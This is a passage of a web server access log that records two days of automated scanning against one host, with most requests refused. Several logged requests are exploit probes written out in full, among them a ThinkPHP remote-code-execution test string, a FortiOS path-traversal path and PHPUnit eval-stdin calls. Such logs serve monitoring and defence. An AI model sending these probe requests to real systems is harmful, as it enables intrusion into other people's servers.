+0000] 444 - GET https 64.22.31.253 "/" [Client 159.223.20.144] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [17/Oct/2021:07:22:27 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [17/Oct/2021:07:39:08 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.200.207] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:07:48:31 +0000] 400 - - https localhost "-" [Client 18.221.250.37] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:09:20:38 +0000] 444 - GET https agent.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [17/Oct/2021:10:00:23 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:24 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:26 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:26 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:28 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:29 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [17/Oct/2021:10:00:30 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:31 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:33 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:34 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Oct/2021:10:00:38 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [17/Oct/2021:11:01:13 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [17/Oct/2021:11:05:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.203.98] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:11:23:04 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [17/Oct/2021:11:24:02 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [17/Oct/2021:11:25:02 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [17/Oct/2021:11:35:46 +0000] 400 - GET https localhost "/" [Client 161.35.188.242] [Length 154] [Gzip -] "-" "-" [17/Oct/2021:11:51:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [17/Oct/2021:13:01:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.51] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:13:15:49 +0000] 400 - - http localhost "-" [Client 87.251.75.145] [Length 154] [Gzip -] "-" "-" [17/Oct/2021:14:57:17 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 13.57.205.8] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [17/Oct/2021:16:08:33 +0000] 400 - GET http localhost "/" [Client 147.182.206.135] [Length 252] [Gzip -] "-" "-" [17/Oct/2021:16:23:27 +0000] 400 - - https localhost "-" [Client 35.213.211.88] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:16:39:46 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.41] [Length 0] [Gzip -] "Go http package" "-" [17/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Oct/2021:17:47:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.43] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:17:47:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] [Gzip -] "-" "-" [17/Oct/2021:17:47:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [17/Oct/2021:19:09:03 +0000] 444 - GET https router.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [17/Oct/2021:20:30:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Oct/2021:20:58:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:20:58:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [17/Oct/2021:20:58:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [17/Oct/2021:21:07:24 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Oct/2021:21:07:25 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Oct/2021:21:20:56 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.202.87] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:22:50:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Oct/2021:23:29:31 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.79] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [18/Oct/2021:01:30:07 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.147] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:01:31:28 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.210.178] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:02:25:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:02:50:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.241.45.58] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [18/Oct/2021:03:30:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [18/Oct/2021:03:30:31 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211018112857" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [18/Oct/2021:04:58:20 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:21 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:24 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:24 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [18/Oct/2021:04:58:24 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:27 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:28 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:30 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:32 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:35 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:04:58:36 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [18/Oct/2021:04:59:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:04:59:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:05:00:09 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:05:27:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [18/Oct/2021:05:35:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:06:13:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [18/Oct/2021:06:43:45 +0000] 400 - GET https localhost "/" [Client 167.99.133.28] [Length 154] [Gzip -] "-" "-" [18/Oct/2021:06:44:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.133.28] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [18/Oct/2021:07:09:39 +0000] 400 - - https localhost "-" [Client 35.217.10.228] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:08:02:12 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.208.78] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:08:40:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.146.185] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Oct/2021:08:40:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.146.185] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Oct/2021:08:40:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.146.185] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Oct/2021:08:40:30 +0000] 400 - - https localhost "-" [Client 71.6.146.185] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:08:40:30 +0000] 400 - - https localhost "-" [Client 71.6.146.185] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:08:40:31 +0000] 400 - - https localhost "-" [Client 71.6.146.185] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:08:40:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [18/Oct/2021:09:52:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.53.170.243] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Oct/2021:10:45:48 +0000] 444 - GET https 139.162.113.11 "/" [Client 206.189.132.212] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "-" [18/Oct/2021:11:08:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.199.91] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:11:16:46 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Oct/2021:11:42:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 198.20.69.98] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Oct/2021:11:42:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 198.20.69.98] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Oct/2021:11:42:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 198.20.69.98] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Oct/2021:11:42:54 +0000] 400 - - https localhost "-" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:11:42:54 +0000] 400 - - https localhost "-" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:11:42:55 +0000] 400 - - https localhost "-" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:11:43:00 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:11:43:01 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:11:43:02 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:11:43:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [18/Oct/2021:13:03:02 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.215] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Oct/2021:15:27:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.130] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [18/Oct/2021:15:27:21 +0000] 400 - - https localhost "-" [Client 23.129.64.130] [Length 154] [Gzip -] "-" "-" [18/Oct/2021:15:27:26 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.141] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:15:27:29 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.171] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:15:27:36 +0000] 400 - - https localhost "-" [Client 23.129.64.150] [Length 154] [Gzip -] "-" "-" [18/Oct/2021:15:47:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Oct/2021:17:39:38 +0000] 400 - - https localhost "-" [Client 18.117.76.182] [Length 0] [Gzip -] "-" "-" [18/Oct/2021:20:22:49 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [18/Oct/2021:20:41:02 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Oct/2021:20:41:02 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Oct/2021:20:41:02 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Oct/2021:20:41:02 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Oct/2021:20:41:02 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Oct/2021:20:41:02 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Oct/2021:20:42:32 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [18/Oct/2021:21:18:29 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Oct/2021:21:22:42 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:42 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:49 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:53 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:53 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:55 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [18/Oct/2021:21:22:55 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:57 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:57 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:58 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 